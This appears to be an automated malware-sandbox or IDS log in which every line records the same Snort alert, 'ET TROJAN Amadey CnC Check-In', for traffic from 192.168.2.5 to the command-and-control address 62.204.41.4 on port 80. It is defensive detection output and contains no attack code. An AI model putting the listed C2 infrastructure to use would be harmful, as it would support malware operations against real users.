                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49797 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49798 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49799 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49800 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49801 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49802 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49803 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49804 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49805 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49806 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49807 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49808 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49809 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49810 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49811 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49812 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49813 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49814 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49815 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49816 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49817 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49818 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49819 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49821 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49822 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49823 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49824 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49825 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49826 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49827 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49828 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49829 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49830 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49831 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49832 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49833 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49834 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49835 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49836 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49837 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49838 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49839 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49840 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49841 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49842 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49843 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49844 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49845 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49846 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49847 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49848 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49849 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49850 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49851 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49852 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49853 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49854 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49855 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49856 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49857 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49858 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49859 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49860 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49861 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49862 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49863 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49864 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49865 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49866 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49867 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49868 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49869 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49870 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49871 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49873 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49874 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49875 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49876 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49877 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49878 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49879 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49880 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49881 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49882 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49883 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49884 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49885 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49886 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49887 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49888 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49889 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49890 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49891 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49892 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49893 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49894 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49895 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49896 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49897 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49898 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49899 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49900 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49901 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49902 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49903 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49904 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49905 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49906 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49907 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49908 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49909 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49910 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49911 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49912 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49913 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49914 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49915 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49916 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49917 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49918 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49919 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49920 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49921 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49922 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49923 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49924 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49925 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49926 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49927 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49928 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49929 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49930 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49931 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49932 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49933 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49934 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49935 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49937 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49938 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49939 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49940 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49941 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49942 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49943 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49944 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49945 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49946 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49947 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49948 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49949 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49950 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49951 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49952 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49953 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49954 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49955 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49956 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49957 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49958 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49959 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49960 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49961 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49962 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49963 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49964 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49965 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49966 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49967 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49968 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49969 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49970 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49971 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49972 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49973 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49974 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49975 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49976 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49977 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49978 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49979 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49980 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49981 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49982 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49983 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49984 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49985 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49986 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49987 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49988 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49989 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49990 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49991 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49992 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49993 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49994 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49995 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49996 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49997 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49998 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49999 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50000 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50001 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50002 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50003 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50004 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50005 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50006 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50007 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50008 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50009 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50010 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50011 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50012 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50013 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50014 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50015 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50016 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50017 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50018 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50019 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50020 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50021 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50022 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50023 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50024 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50025 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50026 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50027 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50028 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50029 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50030 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50031 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50032 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50033 -> 62.204.41.4:80
